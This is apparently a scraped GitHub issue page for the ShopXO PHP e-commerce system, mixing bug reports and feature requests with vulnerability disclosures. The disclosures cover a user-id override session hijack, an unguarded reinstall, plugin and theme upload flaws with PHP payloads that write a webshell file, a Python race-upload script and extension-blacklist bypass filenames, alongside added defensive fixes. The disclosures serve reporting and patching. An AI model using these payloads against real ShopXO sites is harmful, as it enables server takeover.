gongfuxiang / shopxo
ShopXO is an enterprise-grade, free, open-source e-commerce system with visual drag-and-drop DIY page building, covering PC, H5, multi-platform mini programs (WeChat + Alipay + Baidu + Toutiao & Douyin + QQ + Kuaishou), APP, multi-warehouse, multi-merchant, multi-store, IM customer service and purchase/sales/inventory management; released under the MIT open-source license and built on the ThinkPHP8 framework.
Home Page: https://shopxo.net
License: MIT License
Replace `'^1((3|5|8|7){1}\d{1})\d{8}$'` on line 369 of application\lang\zh-cn.php with the following: `^1([358][0-9]|4[579]|66|7[0135678]|9[89])[0-9]{8}$`
The product edit page has nowhere to change the stock quantity; the default stock is 0.
APPLICATION and $params['user_id'] can be controlled by the user, so there is a variable override problem.
Using the avatar change interface:
1. Add the parameter application=app together with a user_id parameter; $params['user_id'] (the user id) then becomes the id the user specified.
2. Enter the UserLoginRecord method; there seems to be no problem here.
3. Enter the UserAvatarUpload method; after the image upload finishes, it calls UserLoginRecord again.
4. Enter UserLoginRecord again. Because this call does not pass $is_app, it defaults to false.
The end result is that the user stored in the current session becomes whatever user id the user chose, and that id is a simple, guessable number.
5. Final effect
Steps to reproduce:
Hello:
I work at 360 Code Guard (360代码卫士). During our open-source code audit we found that shopxo has a system reinstallation vulnerability. Details are as follows:
In the file shopxo\application\install\controller\Index.php, the Add method does not check the lock file, which lets an attacker reinstall the database.
Construct a POST request as follows
You can see that a new database named shopxo2 was created in the local database. In a real scenario the attacker can enable remote connections on a database on their own public server and connect to their own database.
Most critically, the database configuration file is also modified.
This spot can be used to write PHP code to get a shell. Since this is on GitHub I won't go into the details; if you are interested in the subsequent getshell process, I would be happy to tell you by email.
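A lock-file guard of the kind the report says the Add method is missing, added here as an illustration rather than shopxo's own installer code; the lock path, the installAdd/installAcquireLock names and the $doInstall callback are assumptions:

```php
<?php
// Added example, not shopxo's install controller. The lock path, the
// function names and the $doInstall callback are assumptions.

const INSTALL_LOCK = __DIR__ . '/install.lock'; // hypothetical location

/** True once a completed installation has left its lock file behind. */
function installIsLocked(string $lock = INSTALL_LOCK): bool
{
    return is_file($lock);
}

/**
 * Create the lock with fopen mode 'x': the call fails if the file already
 * exists, so two install requests racing each other cannot both win.
 */
function installAcquireLock(string $lock = INSTALL_LOCK): bool
{
    $fh = @fopen($lock, 'x');
    if ($fh === false) {
        return false;
    }
    fwrite($fh, 'installed ' . date('c') . PHP_EOL);
    fclose($fh);
    return true;
}

/**
 * Guarded installer entry. $post is the request body; $doInstall does the
 * real work (write config, create schema) and returns true on success.
 * Request data is not read at all until the lock check has passed.
 */
function installAdd(array $post, callable $doInstall, string $lock = INSTALL_LOCK): array
{
    if (installIsLocked($lock)) {
        return ['code' => -1, 'msg' => 'already installed'];
    }
    // Take the lock before installing so a concurrent request cannot start a second install.
    if (!installAcquireLock($lock)) {
        return ['code' => -1, 'msg' => 'install already in progress'];
    }
    try {
        if (!$doInstall($post)) {
            unlink($lock); // failed install: allow a retry
            return ['code' => -1, 'msg' => 'install failed'];
        }
    } catch (Throwable $e) {
        unlink($lock);
        throw $e;
    }
    return ['code' => 0, 'msg' => 'installed'];
}

// Constructed demo: the second call is refused even with attacker-chosen db settings.
$lock = sys_get_temp_dir() . '/shopxo-demo-install.lock';
@unlink($lock);
$fakeInstall = function (array $post): bool { return isset($post['db_host']); };
var_dump(installAdd(['db_host' => 'localhost'], $fakeInstall, $lock)['code']);        // int(0)
var_dump(installAdd(['db_host' => 'attacker.example'], $fakeInstall, $lock)['code']); // int(-1)
unlink($lock);
```

The check has to run before any request field is touched, and the lock must be created with an exclusive open so that two concurrent install requests cannot both pass the is_file test; an existing database config file is a second signal worth refusing on.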
Hello author, how do I disable the mobile version so that phone visitors only see the PC version?
They are all about 200k in size.
After all, it is no longer maintained.
When uploading payment plug-ins, attackers can bypass file verification and upload malicious PHP files by constructing the code of the PHP file inside the zip archive. Even uploading a PHP file without constructing the code will trigger the file inclusion vulnerability, or files can be uploaded through a race (competitive) upload.
In the Upload method in the application\service\PaymentService.php file, the file_put_contents function parameter is controllable.
But it later calls the GetPaymentConfig method to do file verification; if the file verification is not passed, the file is deleted.
In the GetPaymentConfig method, the class_exists function checks whether the class is defined (the class uses its fully qualified name), and then it checks whether three methods are defined in the class.
According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows:
```php
<?php
namespace payment;
class a{
    public function __construct($params = [])
    {
        phpinfo();
    }
    public function Config()
    {
    }
    public function Pay()
    {
    }
    public function Respond()
    {
    }
}
$b=new a();
?>
```
Finally, the method is called in application\admin\controller\Payment.php
After logging in to the background, upload the zip package containing a.php at the site management -> payment method -> upload
Visit extend/payment/a.php
Not by constructing code:
The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in /thinkphp/library/think/Loader.php
findFile is the function of thinkphp to find files. It is mainly loaded through psr-4 and classmap. The fully qualified name of the class we passed in is returned by the findFile function and finally spliced into the complete file path.
Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation
At this point we have not yet reached the subsequent file deletion, but the file has already been included, so its code is also executed.
Upload the zip archive containing the php file at the same location, the code content is:
```php
<?php $f = '1.php'; $shell = '<?php phpinfo(); ?>'; file_put_contents($f,$shell); ?>
```
Although an upload-failed message is returned after uploading, the code has already been included and executed.
The file is created as 1.php under the root directory of the shopxo installation; visit 1.php.
There is also a problem with uploading files and then deleting them. If file inclusion does not happen here, there is another way to upload files: a race (competitive) upload, because there is a time gap between file verification and file deletion, and you can keep uploading while continuously accessing the file.
I use Burp Suite's Intruder module to keep sending requests and a Python script to keep accessing the file.
The Python script is as follows:
```python
import requests

url = 'http://url/extend/payment/2.php'
while True:
    s = requests.get(url)
    if 'phpinfo' in s.text:
        print(s.text)
        exit()
```
Upload the php file in the compressed package as follows:
```php
<?php
phpinfo();
$f = '1.php';
$shell = '<?php phpinfo(); ?>';
file_put_contents($f,$shell);
?>
```
The generated php file is in the extend\payment directory
Visit extend\payment\1.php
The $value{0} syntax has to be changed to $value[0], otherwise it throws an error.
The code involving database transactions is a bit messy~~~
See application/service/OrderService.php:399:
```php
Db::startTrans();
// Message notification
$detail = '订单支付成功,金额'.PriceBeautify($params['order']['total_price']).'元';
MessageService::MessageAdd($params['order']['user_id'], '订单支付', $detail, 1, $params['order']['id']);
// Update order status
$upd_data = array(
    'status'     => 2,
    'pay_status' => 1,
    'pay_price'  => $pay_price,
    'payment_id' => $params['payment']['id'],
    'pay_time'   => time(),
    'upd_time'   => time(),
);
if(Db::name('Order')->where(['id'=>$params['order']['id']])->update($upd_data))
{
    // Add status log
    if(self::OrderHistoryAdd($params['order']['id'], 2, $params['order']['status'], '支付', 0, '系统'))
    {
        // Deduct inventory
        $ret = BuyService::OrderInventoryDeduct(['order_id'=>$params['order']['id'], 'order_data'=>$upd_data]);
        if($ret['code'] != 0)
        {
            // Roll back the transaction
            Db::rollback();
            return DataReturn($ret['msg'], -10);
        }
        // Commit the transaction
        Db::commit();
        return DataReturn('支付成功', 0);
    }
}
// Roll back the transaction
Db::rollback();
```
bug: when requesting a refund, right after choosing a reason it prompts: 请选择退款理由 (please select a refund reason)
2.2.0 installed from GitHub: when buying a product, selecting a product specification gives the error 商品id有误 (product id is incorrect); after submitting the order it errors with 商品信息为空 (product information is empty).
Lines 11, 62 and 360:
<th width="25%">坏境</th>
Typo.
Can this system be extended for financial analysis, or be used as part of an invoicing system? I mainly want to add some financial analysis elements.
I looked for a long time at the index method of the user controller under the index module; there are many hooks in it, but I can't see them having any effect, which is confusing.
Product pre-sale (reservation), deposit payment, deposit deduction (deposit-doubling feature).
Admin: Site Management -> Navigation Management throws an "Undefined array index: items" error.
Clicking Personal Center pops up an alert: 百度未授权使用地图API,可能是因为您提供的密钥不是有效的百度LBS开放平台密钥,或此密钥未对本应用的百度地图JavaScriptAPI授权。您可以访问如下网址了解如何获取有效的密钥:http://lbsyun.baidu.com/apiconsole/key# (Baidu Maps API not authorized: the supplied key is not a valid Baidu LBS key, or the key has not been authorized for this application's Baidu Maps JavaScript API).
How can I fix this?
application/service/PaymentService.php line 153: in the $payment ternary operator, should the part after the colon be an empty string? It is currently $payment.
I looked into the cause and found that after going through a CDN, the user IP returned by the built-in function GetClientIP is:
218.17.xx.xx,218.93.204.51,36.42.75.103
It has become a comma-separated three-part value; the last two are both CDN node IPs.
$ips = explode(',', $onlineip);
Suggest: return reset($ips);
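A client-IP lookup that does not simply take the first comma-separated entry, added here as an example and not shopxo's GetClientIP; TRUSTED_PROXIES, clientIp and every address below are constructed sample values:

```php
<?php
// Added example; this is not shopxo's GetClientIP. The proxy ranges and
// the forwarded chains at the bottom are constructed sample values.

/** Constructed list of CDN / reverse-proxy ranges allowed to set the header. */
const TRUSTED_PROXIES = ['218.93.204.0/24', '36.42.75.0/24', '127.0.0.1/32'];

/** IPv4-only CIDR membership test. */
function ipInCidr(string $ip, string $cidr): bool
{
    [$net, $bits] = explode('/', $cidr, 2);
    $ipLong  = ip2long($ip);
    $netLong = ip2long($net);
    if ($ipLong === false || $netLong === false) {
        return false;
    }
    $bits = (int)$bits;
    $mask = $bits === 0 ? 0 : ((-1 << (32 - $bits)) & 0xFFFFFFFF);
    return ($ipLong & $mask) === ($netLong & $mask);
}

function isTrustedProxy(string $ip): bool
{
    foreach (TRUSTED_PROXIES as $cidr) {
        if (ipInCidr($ip, $cidr)) {
            return true;
        }
    }
    return false;
}

/**
 * $remoteAddr is the TCP peer (REMOTE_ADDR); $forwardedFor is the raw
 * X-Forwarded-For value. Walks the chain from the right, dropping every
 * trusted hop, and returns the first address that is not one of ours.
 */
function clientIp(string $remoteAddr, ?string $forwardedFor): string
{
    // A peer that is not our proxy can write anything into the header: ignore it.
    if ($forwardedFor === null || !isTrustedProxy($remoteAddr)) {
        return $remoteAddr;
    }
    $chain = array_map('trim', explode(',', $forwardedFor));
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        $hop = $chain[$i];
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            break; // garbage in the chain: stop trusting anything further left
        }
        if (!isTrustedProxy($hop)) {
            return $hop;
        }
    }
    return $remoteAddr; // every hop was ours
}

// Constructed traffic: peer is a CDN node, chain holds the client plus one CDN hop.
var_dump(clientIp('36.42.75.103', '218.17.1.2, 218.93.204.51'));          // "218.17.1.2"
// A forged entry prepended by the client is ignored; the real client still wins.
var_dump(clientIp('36.42.75.103', '1.2.3.4, 218.17.1.2, 218.93.204.51')); // "218.17.1.2"
// Direct connection that did not come through the CDN: header not trusted at all.
var_dump(clientIp('203.0.113.9', '1.2.3.4'));                             // "203.0.113.9"
```

reset($ips) returns whatever the requester placed at the front of the header, since anyone can send X-Forwarded-For with an arbitrary prefix; stripping known proxy hops from the right is what makes the remaining leftmost entry trustworthy, and anything that logs, rate-limits or bans by IP depends on this.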
For example, the product stock is 1; A and B both read it at the same time and both place orders, and the stock ends up at -1.
I skimmed the source and didn't seem to see any locking.
As in the title.
Feature Request: add one-click import of WeChat addresses.
Is there an Alipay demo? I couldn't find shopxo in the Alipay mini program search.
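The oversell described above and the statement-level guard that prevents it, as an added example (not shopxo's BuyService::OrderInventoryDeduct) run against a constructed in-memory SQLite table:

```php
<?php
// Added example; not shopxo's inventory code. Uses an in-memory SQLite
// table with constructed data to reproduce the oversell and to show the
// atomic conditional UPDATE that prevents it.

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE goods (id INTEGER PRIMARY KEY, inventory INTEGER NOT NULL)');
    $db->exec('INSERT INTO goods (id, inventory) VALUES (1, 1)'); // one unit left
    return $db;
}

function readStock(PDO $db, int $goodsId): int
{
    $st = $db->prepare('SELECT inventory FROM goods WHERE id = :id');
    $st->execute([':id' => $goodsId]);
    return (int)$st->fetchColumn();
}

/** Race-prone pattern: the check lives in PHP and the decrement is unconditional. */
function writeStockUnchecked(PDO $db, int $goodsId, int $qty): void
{
    $st = $db->prepare('UPDATE goods SET inventory = inventory - :qty WHERE id = :id');
    $st->execute([':qty' => $qty, ':id' => $goodsId]);
}

/**
 * Safe pattern: guard and decrement are one statement, so the database
 * serialises them. Returns false when stock was insufficient, in which
 * case the caller rolls the order back.
 */
function deductSafe(PDO $db, int $goodsId, int $qty): bool
{
    $st = $db->prepare(
        'UPDATE goods SET inventory = inventory - :qty
          WHERE id = :id AND inventory >= :need'
    );
    $st->execute([':qty' => $qty, ':id' => $goodsId, ':need' => $qty]);
    return $st->rowCount() === 1;
}

// 1) The interleaving from the issue: A and B both read 1, then both write.
$db = openDemoDb();
$seenByA = readStock($db, 1);
$seenByB = readStock($db, 1);
if ($seenByA >= 1) { writeStockUnchecked($db, 1, 1); }
if ($seenByB >= 1) { writeStockUnchecked($db, 1, 1); }
echo 'unchecked: ', readStock($db, 1), PHP_EOL;   // -1 (oversold)

// 2) The same two orders through the guarded statement.
$db = openDemoDb();
$a = deductSafe($db, 1, 1); // true
$b = deductSafe($db, 1, 1); // false: guard failed, nothing written
echo 'guarded: ', readStock($db, 1), ' a=', var_export($a, true), ' b=', var_export($b, true), PHP_EOL;
// guarded: 0 a=true b=false
```

Inside the Db::startTrans() block shown earlier on this page the same idea is an update whose where clause includes the inventory >= quantity condition, with the order rolled back when zero rows are affected; reading the row with the query builder's lock(true) (SELECT ... FOR UPDATE) before deciding is the alternative when several rows must be checked together.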
Hey there!
I'd like to report a security issue but cannot find contact instructions on your repository.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Clicking Admin -> Site Settings -> Site Search -> Search, and Extensions, all report errors.
As in the title.
First, a thumbs-up for you: a really good project, clean and clear, streets ahead of other open-source projects.
Has anyone tried deploying on Plesk? After following the tutorial, it blew up immediately; even Plesk wouldn't open ("Err_Connection_Refused"), I couldn't SSH into the machine either, and after a reboot it kept crashing and was unreachable...
Later I tried again on one or two new machines; the currently stable setup is the following:
Ubuntu 18, 1 CPU, 2 GB RAM
Plesk Obsidian 18.0.20
7.3.11, FPM application served by nginx
MariaDB 10
Let's Encrypt
The problem seems to be setting the runtime folder to 777; something probably went wrong with the cache, and I don't know how it managed to take Plesk down outright. All sites on Plesk stopped responding with "Err_Connection_Refused", but I could still reach the panel on port 8443, which showed the Apache and nginx services running normally, CPU peaking at only 47% and RAM at most 490 MB... After some fiddling around, port 8443 died too and SSH couldn't connect... Luckily it was a dev machine...
Later I deleted and reinstalled Plesk and deployed shopxo 1.7 again without changing the runtime permissions, leaving them at the original 755. So far the site admin (admin.php) has only crashed a few times (499, 503, 504), and it hasn't affected Plesk or the other sites.
Since the previous machine was completely wrecked I can't provide more information; it is still stable without setting runtime to 777, and if it crashes again I will provide more information.
How can I customize the coupon price for goods?
You previously fixed one vulnerability in the theme file upload.
But now there is a similar vulnerability in /app/admin/appmini.php, because you didn't use the above method.
http://localhost:3000/admin.php?s=appmini/index/nav_type/weixin/view_type/upload.html
Then my file will be uploaded to sourcecode/weixin/
And I can bypass the !IS_AJAX check, even uploading my files to any writable directory using ../
admin.php?s=appmini/themeupload&ajax=ajax
The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways
The PluginsUpload method in the application\service\PluginsAdminService.php file has a file creation operation, in which the input of the file_put_contents function is controllable
Line 1072 checks the file suffix; this is a blacklist check.
The value in the private static variable $exclude_ext is '.php', which can easily be bypassed.
There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules
shell.php::$DATA
shell.php::$DATA…….
shell.php.
shell.php(space)
shell.php:1.jpg
The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website
Through the audit of the PluginsUpload method in the PluginsAdminService.php file
When the zip archive does not match the resource directory, it jumps out of the loop that reads the archive files.
And the resource directory cannot be controller, because the directory corresponding to controller already exists, and the archive is closed directly without entering the subsequent file writing operation.
Finally, the method is called in the Upload method of the application\admin\controller\Pluginsadmin.php file
The attacker can upload such a compressed package after logging into the background system
And upload the compressed package at Application Center -> Application Management -> Upload Application
Visit public\static\upload\file_uploadfile_\shell.php
In application\service\ThemeService.php there is also the same blacklist verification problem for uploaded files
The processing logic is very similar to the above file
After logging in to the system, upload the zip archive at the site management -> theme management -> theme installation
Visit public\static\index\test.php after uploading
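Allowlist-based archive checking that covers both the payment-plugin upload reported earlier on this page and the plugin/theme uploads in this report, added as an example and not shopxo's PaymentService/PluginsUpload/ThemeService code; ALLOWED_EXT, the function names and the sample archive are constructed:

```php
<?php
// Added example, not shopxo's upload code. Every entry of the uploaded
// archive is checked BEFORE anything is written to disk, so there is no
// "write, then verify, then delete" window, and the decision is an
// extension allowlist rather than a '.php' blacklist.

const ALLOWED_EXT = ['css', 'js', 'png', 'jpg', 'jpeg', 'gif', 'svg', 'html', 'json', 'woff', 'woff2'];

/** Reject traversal, absolute paths, NUL bytes, NTFS streams and trailing dots/spaces. */
function entryNameIsSafe(string $name): bool
{
    if ($name === '' || strpos($name, "\0") !== false) return false;
    if ($name[0] === '/' || $name[0] === '\\') return false;   // absolute path
    if (strpos($name, ':') !== false) return false;            // shell.php::$DATA, shell.php:1.jpg, C:\...
    foreach (preg_split('#[\\\\/]+#', $name) as $part) {
        if ($part === '..') return false;                      // ../ escape from the target dir
        if ($part !== rtrim($part, " .")) return false;        // "shell.php." / "shell.php "
    }
    return true;
}

/** Allowlist on the last extension only; files without one (e.g. .htaccess) are rejected. */
function extensionIsAllowed(string $name): bool
{
    $base = basename(str_replace('\\', '/', $name));
    $dot = strrpos($base, '.');
    if ($dot === false || $dot === 0) return false;
    return in_array(strtolower(substr($base, $dot + 1)), ALLOWED_EXT, true);
}

/**
 * Returns [] when the archive is acceptable, otherwise the offending entry names.
 * Nothing is extracted here; the caller extracts only on an empty result, into a
 * directory the web server does not execute as PHP.
 */
function validateArchive(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) return ['<cannot open archive>'];
    $bad = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if (substr($name, -1) === '/') {                       // directory entry: name check only
            if (!entryNameIsSafe($name)) $bad[] = $name;
            continue;
        }
        if (!entryNameIsSafe($name) || !extensionIsAllowed($name)) $bad[] = $name;
    }
    $zip->close();
    return $bad;
}

// Constructed sample archive: one benign entry and three hostile entry names.
$tmp = tempnam(sys_get_temp_dir(), 'zipcheck');
$zip = new ZipArchive();
$zip->open($tmp, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('theme/style.css', 'body{}');
$zip->addFromString('theme/shell.php', '<?php ?>');
$zip->addFromString('theme/shell.php.', 'x');
$zip->addFromString('../outside.js', 'x');
$zip->close();
print_r(validateArchive($tmp)); // theme/shell.php, theme/shell.php., ../outside.js
unlink($tmp);
```

Checking the entry list before extraction removes the write-verify-delete gap that both the inclusion path and the race upload depend on; class_exists must never be pointed at an untrusted file, because the autoloader will include it as part of the lookup; and the extraction target should be a directory where PHP execution is disabled, so that a double extension such as shell.php.jpg is inert even if the allowlist is later widened.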
Are there plans to support third-party merchant onboarding, like JD.com?
During installation it prompts: Array and string offset access syntax with curly braces is deprecated
Face-to-face payment (当面付) does not require a business license.